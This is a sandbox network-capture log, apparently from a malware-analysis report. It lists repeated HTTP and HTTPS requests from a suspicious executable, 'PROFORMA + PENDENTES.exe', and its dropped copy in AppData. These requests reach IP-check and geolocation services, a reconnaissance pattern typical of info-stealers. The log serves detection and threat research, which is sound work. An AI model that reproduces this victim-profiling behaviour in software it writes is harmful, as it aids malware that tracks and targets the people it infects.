Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49732	158.101.44.242	80	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:54.498285055 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:55.139745951 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:55 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5c88b0ab8a5695676cacd0a62437f08e Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49736	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:55.732147932 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:56.969085932 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:56.969322920 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>
Nov 18, 2024 18:18:56.969469070 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:56 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 699b1bb4d999ae69457de927bfd02ec8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.8	49738	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:57.955004930 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:18:58.976974010 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:58 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 62f5455bdc3326f9ce48cc38bbe4bc5f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49740	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:18:59.830641985 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:19:00.469577074 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:19:00 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2dcffc2d57e31343f44d12c0158eaab8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.8	49742	158.101.44.242	80	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
Nov 18, 2024 18:19:01.317320108 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 18, 2024 18:19:02.925770998 CET	323	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:19:02 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5022fe0e52dfc3f7be21d53143b44149 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 155.94.241.187</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49711	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:45 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:45 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:45 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51799 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2l9zOJIn%2F6tL4UZREvJsf8LZ0Gdx3iGRXNxWS%2Fh3Aw0a7m4RmD8V%2BzWCEIP8Y3ItmuFuWKQBszIbLtzF8TZLWcj9EaKWhIuI0Nln43p30m%2F04W%2F63fQC8nhHuJCxis4r2dhc2%2Bp4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f1f19e4e73b-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=18914&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=153008&cwnd=32&unsent_bytes=0&cid=946b81b8856f4cd9&ts=295&x=0"
2024-11-18 17:18:45 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49712	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:46 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:46 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:46 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 394 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6H8OkkAHTclkf8uR6lTGhupHeig%2B7uuLx21UC%2FgyzlkVPZenqqD0W3axJZY0R2A9xeX0nkrVmO5EvBc8mywj%2BZg2WnJFdYmWeR7xlgBFzYd59OpRHhljJIj%2BVSaLSS5uprtlW416"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f272a0c2231-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23569&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=122395&cwnd=32&unsent_bytes=0&cid=e208289ad325f8be&ts=174&x=0"
2024-11-18 17:18:46 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49714	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:48 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:48 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:48 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 396 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81PgmDNe%2FvyuXzMegnIIpmfurjIOJOZuwzQzKvbh7fGImF2DN%2FP5alxZXT0PP5Chj4Jk7BgBBcJRa8%2FSNtacFJrQiEn1k95RZsKmguEXZXNBbrhEAewwY6zCusSOndCqww%2F5V6mL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f30993cdada-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23680&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=121217&cwnd=32&unsent_bytes=0&cid=8b63719b1a82aa36&ts=178&x=0"
2024-11-18 17:18:48 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.8	49716	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:49 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:49 UTC	848	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:49 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 6367 Last-Modified: Mon, 18 Nov 2024 15:32:42 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HFbEpdPktL5H3JEyHtfotIDxuwPD1YXvBcVzmbZ6gFAPy8z%2BvQ%2Fx2t6bNbo2V8sJtoyee3bl8NOoEPtg6i7VJ12epEJOvub2dSmcMAS8m4Ve%2FGpzbxM86i0z7EUpMfmamWBO00bu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f39bddfbf69-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17813&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=162943&cwnd=32&unsent_bytes=0&cid=029d0e3caf688df2&ts=189&x=0"
2024-11-18 17:18:49 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49720	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:51 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:51 UTC	849	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:51 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 399 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i6PIT%2BCkcIXWV0ZiRcXSn7z8cCtvoAlTTdRXX7MqFS3%2Bf5LXgOZbut4j9JQ4PPfuJw%2F5DG9f3UrHh%2BTVIzjZZAUtdiayGN5LZKvvNExDnAfG0O59jlZBzWkRZQREM8jaZ9thFqOn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f435faee81c-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23774&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=122753&cwnd=32&unsent_bytes=0&cid=227d9ba8ce957e17&ts=175&x=0"
2024-11-18 17:18:51 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49719	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:51 UTC	87	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-18 17:18:51 UTC	845	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:51 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 399 Last-Modified: Mon, 18 Nov 2024 17:12:12 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mC46mNS5Ghy1lzbha7Mdx6T376FFPgOoBhHdlAWK%2BTMVLVzR1SoZpHPSyMT30AJgrkzM%2F3w7EbNy4lb6IixCWXYkTVBSetU47V2WQ4615EHgGLV6oMa1eHXmrCwGVsPnayizFLGv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f438b4486ed-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24510&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=118348&cwnd=32&unsent_bytes=0&cid=e418ecd43100f3fc&ts=236&x=0"
2024-11-18 17:18:51 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49722	188.114.97.3	443	5420	C:\Users\user\AppData\Roaming\WYqxTmjfOgdZ.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-18 17:18:52 UTC	63	OUT	GET /xml/155.94.241.187 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-18 17:18:52 UTC	847	IN	HTTP/1.1 200 OK Date: Mon, 18 Nov 2024 17:18:52 GMT Content-Type: text/xml Content-Length: 358 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 51806 Last-Modified: Mon, 18 Nov 2024 02:55:26 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8B5esH54PfrwmLC8hdXx42PAX2SZ3TS5VV28aL0DV7%2FY42SzwIXiNRSw5oH3vwRX2dZ%2B6RQVnuxzvPfm2vvSsnMu0PKbgyfsySjkV4CtjwScDK8Wfc4KeprOzFEZhqElbbCdmNrF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e499f49bf33e76b-DEN alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=19057&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=152453&cwnd=32&unsent_bytes=0&cid=344edee40fd27122&ts=168&x=0"
2024-11-18 17:18:52 UTC	358	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a Data Ascii: <Response><IP>155.94.241.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZone>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49723	188.114.97.3	443	3636	C:\Users\user\Desktop\PROFORMA + PENDENTES.exe

Timestamp	Bytes transferred	Direction	Data
